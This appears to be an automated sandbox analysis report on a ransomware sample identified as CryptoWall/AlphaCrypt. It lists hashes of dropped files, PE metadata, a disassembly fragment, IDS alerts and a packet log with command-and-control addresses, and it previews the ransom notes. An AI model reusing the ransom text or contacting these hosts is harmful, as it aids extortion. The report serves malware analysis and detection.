                                                                                                                          SSDEEP:12288:idKFI8B65Kr43g/B38bUiZT4oC6zyZWdnU4jYAzrasCC1lnkpxLn8ymD6Pnuaxtf:jIk4utSUiVk2yZWtU4jYAf31JkpxLRzx
                                                                                                                          MD5:BC5C99A91004E1E4FEFB21A10DFC9539
                                                                                                                          SHA1:E618E84817C835D02CABCEFFD5DB44C5D4C007B9
                                                                                                                          SHA-256:B3D8FF8168DFDDC6204F70E310A778AF13EA509BF9B1AEFF059D35BD15E1441D
                                                                                                                          SHA-512:9B05A6260C18779C0ACDC78BE379C0B05794CDA2BFEA48FBE6493E4076079FAB562FD0F652519CF613227BD687A6971E7535EADFEF48F6A9F2350357BFDBFF53
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):781246
                                                                                                                          Entropy (8bit):7.999766644859161
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:jNioPVwKs/rnvjd5o41dPCAwkNNkQB7jXiuyMrnu87qRq96zULi3BmSu7isT6k7:5Vz4jduoKdqkQB75yib2I64Lywbv7
                                                                                                                          MD5:20E6A91B207ACECF2E0108AFF9D933F0
                                                                                                                          SHA1:2DDDE51695BEF1E15C579F760937266648F0186B
                                                                                                                          SHA-256:48E1EADCFFB8DDE517E10E8B9F7E741827638380B86F1D06F9BEA4D99588A1E8
                                                                                                                          SHA-512:F3757D5C530DE116197385BAD68F1F6EAF3031784F2DDE0CBB929AEEDBC68F14D1C13D7EF010A572D8892FF0F46CEDDAC1B5DC850DDC6145860ABFC17AEC392D
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):562110
                                                                                                                          Entropy (8bit):7.999634521097577
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:FyGp41iRFEWOg9WFDxziFy9C6Jn+nrvQYSunCnQcHvzJz8GQXfv8G:Fy241euYUFDNic9Czro1QHh
                                                                                                                          MD5:C50F1D1AE37CAC1671FAC9712AA9E0A4
                                                                                                                          SHA1:5A8176A1A84E7D3945D5AB8F65A64FAB0CFE5366
                                                                                                                          SHA-256:419DFC785D372006C4F5081E2E13984F5CFB329EC9755C52524B598D4B8BAD28
                                                                                                                          SHA-512:59A87153AD051A4A1FFE28C47AF9024AAC74B6EF36C1A417EB484CE7C6A5269AA7E6FBA3E657311D9A04CC562B7209BAC480B8F96205C5B2A989C17974816DDC
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):778670
                                                                                                                          Entropy (8bit):7.9997883961911445
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:AJhQRt/1MQJfwUL3pPOO8rpzpkuvHQuj9jEEkW2apGWnYLEd0An3L+yCtc5r:QQzWslzpJ8rpz66j9wEkxmG3LEd0G36S
                                                                                                                          MD5:B1EA50F874E0B9DB9A7ADD1DD86A3B34
                                                                                                                          SHA1:A7A7E49BCCE680D0FF5C940E9584C308B6D05128
                                                                                                                          SHA-256:ACC54ACE830C307BABCF47B108685425CFF3285F30E193D4315E37F816BCEB8E
                                                                                                                          SHA-512:22F32BDB3C3E6C717C5689E0E4D223E0AC4F3B123E122F292826F686417DED6C70AD75B79995260164434780B6A13D53E83D6159706E597E51EAA519EE0BA1EF
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):621310
                                                                                                                          Entropy (8bit):7.999728563888484
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:pBEatWD9X+1PsYfxEwq02yCSBWttKkCQPA0jdNeWWSp:p+qsISyIttdy0JNUSp
                                                                                                                          MD5:03A547178ABC50C4502B8265B53DAFC1
                                                                                                                          SHA1:FCDDCD13F25F29C18712E6849DAC13E7EA97C05A
                                                                                                                          SHA-256:0756F3755A217D95D1EE71BE34C9EAB318FB0785F4A8E9E400E4F7573EC5D266
                                                                                                                          SHA-512:EF6B97AAE33B312A891B2ECDA0C54F7C2655F1329EED583194C0C9062889EAE2F9BF93BD6FAE31D64055AA6EE081223DB2ACB915316CFA2A524FAF7999C2ADC1
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26246446
                                                                                                                          Entropy (8bit):7.999993560462748
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:786432:U3PHUYS9v+iwKXDb6X1uAgSAtNulQGOiXGIiMR:U3PHU9v+CQuALAtNuMiX3R
                                                                                                                          MD5:ED25D6F9CE26EA23F803DA52D642EEE7
                                                                                                                          SHA1:AEBA4000CBD2867B788D95AB51342E23A7819B88
                                                                                                                          SHA-256:DD9925281A2E17409C59EECE3088A9D0934D51AA0D29B8F51939E6EE40024A4C
                                                                                                                          SHA-512:4F40B4E818B08254737F45CC9F370CCCDB8B3426DC1A7D629853B580921EBDBA85FE753F288E3F79323EE6ACD4A3D427C2E0B49DD5281962E8C3D6FFAD40D1E5
                                                                                                                          Malicious:true
                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.522628705686142
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:0t8amSU3vd.exe
                                                                                                                          File size:217'109 bytes
                                                                                                                          MD5:ed98ce8f541e6871d1f39943ce09dfa3
                                                                                                                          SHA1:1fa08e8ce2c70daf4a3456eb53e48484b20d3d12
                                                                                                                          SHA256:ad340c9ea5510d1f0f6149fae0bd5349d6e8b01df4eccc9a2bb300be4bc9d981
                                                                                                                          SHA512:6847b69b8a9d913b46c1abfb0f1ba91070999cda1bd3df6c8229cfdc4b052dc25102d2353548ab436f361083cf9be5836f118ab508e2deb3ffdbfdf286b847aa
                                                                                                                          SSDEEP:6144:0/kdfrM7AyEfU60/IzCsRzxGmw5oCmK2fk7mzBW+g:aks60/KCs5vL9K2fk7mzBg
                                                                                                                          TLSH:F724F002287BAA6FF0D375789F0F432690B6EC21AD96F1474616F58D4CC23277AB6E14
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be.(.. in DOS mode....$..........>...m...m...m...m...m...m...m...m...m...m...ma..m...ma..m...m...m...m...m...m...m...mRich...m................PE..L....FuC...
                                                                                                                          Icon Hash:aaf3e3e3918382a0
                                                                                                                          Entrypoint:0x430382
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:
                                                                                                                          Time Stamp:0x4375461C [Sat Nov 12 01:32:12 2005 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:385b6b380b04c32dbf0bf10a4d80a578
                                                                                                                          Instruction
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          push FFFFFFFFh
                                                                                                                          push 00431138h
                                                                                                                          push 00430510h
                                                                                                                          mov eax, dword ptr fs:[00000000h]
                                                                                                                          push eax
                                                                                                                          mov dword ptr fs:[00000000h], esp
                                                                                                                          sub esp, 68h
                                                                                                                          push ebx
                                                                                                                          push esi
                                                                                                                          push edi
                                                                                                                          mov dword ptr [ebp-18h], esp
                                                                                                                          xor ebx, ebx
                                                                                                                          mov dword ptr [ebp-04h], ebx
                                                                                                                          push 00000002h
                                                                                                                          call dword ptr [00431020h]
                                                                                                                          pop ecx
                                                                                                                          or dword ptr [005170C4h], FFFFFFFFh
                                                                                                                          or dword ptr [005170C8h], FFFFFFFFh
                                                                                                                          call dword ptr [00431048h]
                                                                                                                          mov ecx, dword ptr [005170C0h]
                                                                                                                          mov dword ptr [eax], ecx
                                                                                                                          call dword ptr [00431024h]
                                                                                                                          mov ecx, dword ptr [005170BCh]
                                                                                                                          mov dword ptr [eax], ecx
                                                                                                                          mov eax, dword ptr [00431028h]
                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                          mov dword ptr [005170CCh], eax
                                                                                                                          call 00007F6A84E76A55h
                                                                                                                          cmp dword ptr [004330A8h], ebx
                                                                                                                          jne 00007F6A84E7694Eh
                                                                                                                          push 004304FEh
                                                                                                                          call dword ptr [0043102Ch]
                                                                                                                          pop ecx
                                                                                                                          call 00007F6A84E76A27h
                                                                                                                          push 0043200Ch
                                                                                                                          push 00432008h
                                                                                                                          call 00007F6A84E76A12h
                                                                                                                          mov eax, dword ptr [005170B8h]
                                                                                                                          mov dword ptr [ebp-6Ch], eax
                                                                                                                          lea eax, dword ptr [ebp-6Ch]
                                                                                                                          push eax
                                                                                                                          push dword ptr [005170B4h]
                                                                                                                          lea eax, dword ptr [ebp-64h]
                                                                                                                          push eax
                                                                                                                          lea eax, dword ptr [ebp-70h]
                                                                                                                          push eax
                                                                                                                          lea eax, dword ptr [ebp-60h]
                                                                                                                          push eax
                                                                                                                          call dword ptr [00431034h]
                                                                                                                          push 00432004h
                                                                                                                          push 00432000h
                                                                                                                          call 00007F6A84E769DFh
                                                                                                                          Programming Language:
                                                                                                                          • [ C ] VS98 (6.0) build 8168
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x31144 | 0xc8 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x118000 | 0xab0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x31000 | 0x134 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2f522 | 0x30000 | 24167d9ee8d5aea75d7b45962226fc2a | False | 0.8856964111328125 | data | 7.771301677112809 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x31000 | 0x8de | 0x1000 | 708a5fcf10cc2fd89816537b49b20c91 | False | 0.2880859375 | OpenPGP Secret Key Version 3 | 3.5125682428768963 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x32000 | 0xe50d0 | 0x2000 | 083cba5fe4191acfed11531a48e8194e | False | 0.364013671875 | Matlab v4 mat-file (little endian) \", numeric, rows 0, columns 0 | 3.2714286750301156 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x118000 | 0xab0 | 0x1000 | 7e4ebe48e00149cf33d7a7f7bd6d2f50 | False | 0.3388671875 | data | 2.9923974347632347 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_DIALOG | 0x1186e8 | 0xe8 | data | English | India | 0.771551724137931
RT_DIALOG | 0x1187d0 | 0xec | data | English | India | 0.7711864406779662
RT_DIALOG | 0x1188c0 | 0x104 | data | English | India | 0.7538461538461538
RT_DIALOG | 0x1189c8 | 0xe4 | data | English | India | 0.7675438596491229
RT_ACCELERATOR | 0x1183c0 | 0x38 | data | English | India | 1.0714285714285714
RT_ACCELERATOR | 0x1183f8 | 0x30 | data | English | India | 1.0833333333333333
RT_VERSION | 0x118428 | 0x2bc | data | English | India | 0.4957142857142857
RT_HTML | 0x1183a0 | 0x1d | ASCII text, with no line terminators | English | India | 1.2758620689655173
RT_MANIFEST | 0x118240 | 0x15a | ASCII text, with CRLF line terminators | English | India | 0.5491329479768786
DLL | Import
OLEAUT32.dll | SetErrorInfo
comdlg32.dll | FindTextW, CommDlgExtendedError, GetFileTitleA
ole32.dll | StgOpenStorageEx, CoDisconnectObject, StgGetIFillLockBytesOnILockBytes, HBITMAP_UserUnmarshal, OleCreateFromDataEx, StgGetIFillLockBytesOnFile, CoRegisterMessageFilter, HACCEL_UserUnmarshal, CoTreatAsClass, OleSetMenuDescriptor, HWND_UserFree, OleTranslateAccelerator, STGMEDIUM_UserSize, CoFileTimeNow, CoGetStdMarshalEx, CreateStreamOnHGlobal, CoReleaseMarshalData, StgOpenStorageOnILockBytes, OleCreateFromFileEx, OleSetClipboard, OleRegEnumVerbs, CoTaskMemFree, StgCreateDocfile, OleUninitialize, StgOpenPropStg, OleConvertIStorageToOLESTREAM, IIDFromString, SNB_UserMarshal, HGLOBAL_UserMarshal, OleCreateLinkFromData, RevokeDragDrop, CoRegisterPSClsid, StgOpenStorage, FreePropVariantArray, CoGetPSClsid, CoUnmarshalHresult, SetConvertStg, WriteClassStg, CoResumeClassObjects, OleConvertOLESTREAMToIStorage, CoGetCurrentProcess, CreateAntiMoniker, StringFromGUID2
VERSION.dll | VerQueryValueW, GetFileVersionInfoSizeW
KERNEL32.dll | GetModuleHandleA, GetStartupInfoA, DuplicateHandle
MSVCRT.dll | _controlfp, _except_handler3, __set_app_type, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, __p__fmode
WINSPOOL.DRV | SetPortA
SHELL32.dll | ExtractIconExA
COMCTL32.dll | ImageList_AddMasked
Language of compilation system | Country where language is spoken | Map
English | India |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-08T21:09:37.821207+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49163 | 34.117.59.81 | 80 | TCP
2025-01-08T21:09:59.404903+0100 | 2021723 | ET MALWARE AlphaCrypt CnC Beacon 3 | 1 | 192.168.2.22 | 49164 | 199.116.254.169 | 80 | TCP
2025-01-08T21:09:59.404903+0100 | 2813018 | ETPRO MALWARE AlphaCrypt CnC Beacon 4 | 1 | 192.168.2.22 | 49164 | 199.116.254.169 | 80 | TCP
2025-01-08T21:10:02.476308+0100 | 2021723 | ET MALWARE AlphaCrypt CnC Beacon 3 | 1 | 192.168.2.22 | 49165 | 185.230.63.171 | 80 | TCP
2025-01-08T21:10:02.476308+0100 | 2813018 | ETPRO MALWARE AlphaCrypt CnC Beacon 4 | 1 | 192.168.2.22 | 49165 | 185.230.63.171 | 80 | TCP
2025-01-08T21:10:03.336051+0100 | 2021723 | ET MALWARE AlphaCrypt CnC Beacon 3 | 1 | 192.168.2.22 | 49166 | 185.230.63.171 | 443 | TCP
2025-01-08T21:10:04.741113+0100 | 2021723 | ET MALWARE AlphaCrypt CnC Beacon 3 | 1 | 192.168.2.22 | 49167 | 34.149.87.45 | 443 | TCP
2025-01-08T21:10:05.429191+0100 | 2021723 | ET MALWARE AlphaCrypt CnC Beacon 3 | 1 | 192.168.2.22 | 49168 | 67.22.44.2 | 80 | TCP
2025-01-08T21:10:05.429191+0100 | 2813018 | ETPRO MALWARE AlphaCrypt CnC Beacon 4 | 1 | 192.168.2.22 | 49168 | 67.22.44.2 | 80 | TCP
2025-01-08T21:10:08.210773+0100 | 2812134 | ETPRO MALWARE AlphaCrypt .onion Proxy Domain | 1 | 192.168.2.22 | 63926 | 8.8.8.8 | 53 | UDP
2025-01-08T21:10:08.228147+0100 | 2812134 | ETPRO MALWARE AlphaCrypt .onion Proxy Domain | 1 | 192.168.2.22 | 65510 | 8.8.8.8 | 53 | UDP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                          Jan 8, 2025 21:10:03.336352110 CET49166443192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:03.388891935 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.388938904 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.389007092 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.389302015 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.389314890 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.706938982 CET49166443192.168.2.22185.230.63.171
                                                                                                                          Jan 8, 2025 21:10:03.706955910 CET44349166185.230.63.171192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.853247881 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.853333950 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.888041019 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.888067961 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.888427973 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.888478041 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.898015976 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:03.943341970 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.741127014 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.741194010 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.741256952 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.741329908 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.741374969 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.741374969 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.741374969 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.741461039 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.742603064 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.742621899 CET4434916734.149.87.45192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.742633104 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.742683887 CET49167443192.168.2.2234.149.87.45
                                                                                                                          Jan 8, 2025 21:10:04.787554026 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:04.792347908 CET804916867.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.792421103 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:04.792625904 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:04.797411919 CET804916867.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:05.425394058 CET804916867.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:05.429191113 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:05.457369089 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:05.462261915 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:05.465137005 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:05.465303898 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:05.470077038 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091027975 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091058016 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091075897 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091089964 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091093063 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091124058 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091124058 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091161966 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091178894 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091204882 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091219902 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091219902 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091233015 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091260910 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091270924 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091295958 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091309071 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.091340065 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091629028 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091694117 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.091726065 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.095966101 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.095992088 CET804916967.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.096012115 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:06.096023083 CET4916980192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:08.241554022 CET49170443192.168.2.22103.198.0.111
                                                                                                                          Jan 8, 2025 21:10:08.241601944 CET44349170103.198.0.111192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:08.241652012 CET49170443192.168.2.22103.198.0.111
                                                                                                                          Jan 8, 2025 21:10:08.242950916 CET49170443192.168.2.22103.198.0.111
                                                                                                                          Jan 8, 2025 21:10:08.242961884 CET44349170103.198.0.111192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:14.419737101 CET804916867.22.44.2192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:14.419784069 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:10:29.120671988 CET49170443192.168.2.22103.198.0.111
                                                                                                                          Jan 8, 2025 21:11:07.784815073 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:07.784858942 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:07.784909010 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:07.785192013 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:07.785203934 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:08.457041025 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:08.457396030 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:08.457411051 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:08.458561897 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:08.458656073 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:08.459753036 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:08.459861040 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:08.667342901 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:08.667557001 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:18.356173992 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:18.356245995 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:18.356714010 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:20.054164886 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:20.054188967 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:23.798371077 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:11:23.798420906 CET4916380192.168.2.2234.117.59.81
                                                                                                                          Jan 8, 2025 21:11:23.803670883 CET804916334.117.59.81192.168.2.22
